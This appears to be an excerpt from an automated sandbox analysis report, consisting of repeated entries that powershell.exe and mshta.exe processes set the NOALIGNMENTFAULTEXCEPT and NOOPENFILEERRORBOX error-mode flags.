          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
